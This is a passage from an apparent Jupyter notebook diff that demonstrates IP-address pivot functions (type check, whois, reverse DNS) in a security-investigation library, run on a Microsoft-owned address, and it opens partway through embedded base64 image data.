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"
+    }
+   },
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "![image.png](attachment:64c1580e-21f7-4ed3-af12-4f59ced1d67b.png)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "The containers (\"AzureSentinel\", \"util\", etc.) are also callable\n",
+    "functions - they just return the list of functions they contain."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "whois function\n",
+      "ip_type function\n",
+      "ip_rev_resolve function\n",
+      "geoloc function\n",
+      "geoloc_ips function\n"
+     ]
+    }
+   ],
+   "source": [
+    "IpAddress.util()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Now we're ready to run any of the functions for this entity"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>ip</th>\n",
+       "      <th>result</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>20.72.193.242</td>\n",
+       "      <td>Public</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "              ip  result\n",
+       "0  20.72.193.242  Public"
+      ]
+     },
+     "execution_count": 16,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "IpAddress.util.ip_type(ip_addr)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 17,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>asn</th>\n",
+       "      <th>asn_cidr</th>\n",
+       "      <th>asn_country_code</th>\n",
+       "      <th>asn_date</th>\n",
+       "      <th>asn_description</th>\n",
+       "      <th>asn_registry</th>\n",
+       "      <th>nets</th>\n",
+       "      <th>nir</th>\n",
+       "      <th>query</th>\n",
+       "      <th>raw</th>\n",
+       "      <th>raw_referral</th>\n",
+       "      <th>referral</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>8075</td>\n",
+       "      <td>20.64.0.0/10</td>\n",
+       "      <td>US</td>\n",
+       "      <td>2017-10-18</td>\n",
+       "      <td>MICROSOFT-CORP-MSN-AS-BLOCK, US</td>\n",
+       "      <td>arin</td>\n",
+       "      <td>[{'cidr': '20.40.0.0/13, 20.48.0.0/12, 20.34.0.0/15, 20.64.0.0/10, 20.128.0.0/16, 20.36.0.0/14, ...</td>\n",
+       "      <td>None</td>\n",
+       "      <td>20.72.193.242</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "      <td>None</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "    asn      asn_cidr asn_country_code    asn_date  \\\n",
+       "0  8075  20.64.0.0/10               US  2017-10-18   \n",
+       "\n",
+       "                   asn_description asn_registry  \\\n",
+       "0  MICROSOFT-CORP-MSN-AS-BLOCK, US         arin   \n",
+       "\n",
+       "                                                                                                  nets  \\\n",
+       "0  [{'cidr': '20.40.0.0/13, 20.48.0.0/12, 20.34.0.0/15, 20.64.0.0/10, 20.128.0.0/16, 20.36.0.0/14, ...   \n",
+       "\n",
+       "    nir          query   raw raw_referral referral  \n",
+       "0  None  20.72.193.242  None         None     None  "
+      ]
+     },
+     "execution_count": 17,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.IpAddress.util.whois(ip_addr)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>qname</th>\n",
+       "      <th>rdtype</th>\n",
+       "      <th>response</th>\n",
+       "      <th>ip_address</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>20.72.193.242</td>\n",
+       "      <td>PTR</td>\n",
+       "      <td>None of DNS query names exist: 20.72.193.242., 20.72.193.242.corp.microsoft.com.</td>\n",
+       "      <td>20.72.193.242</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
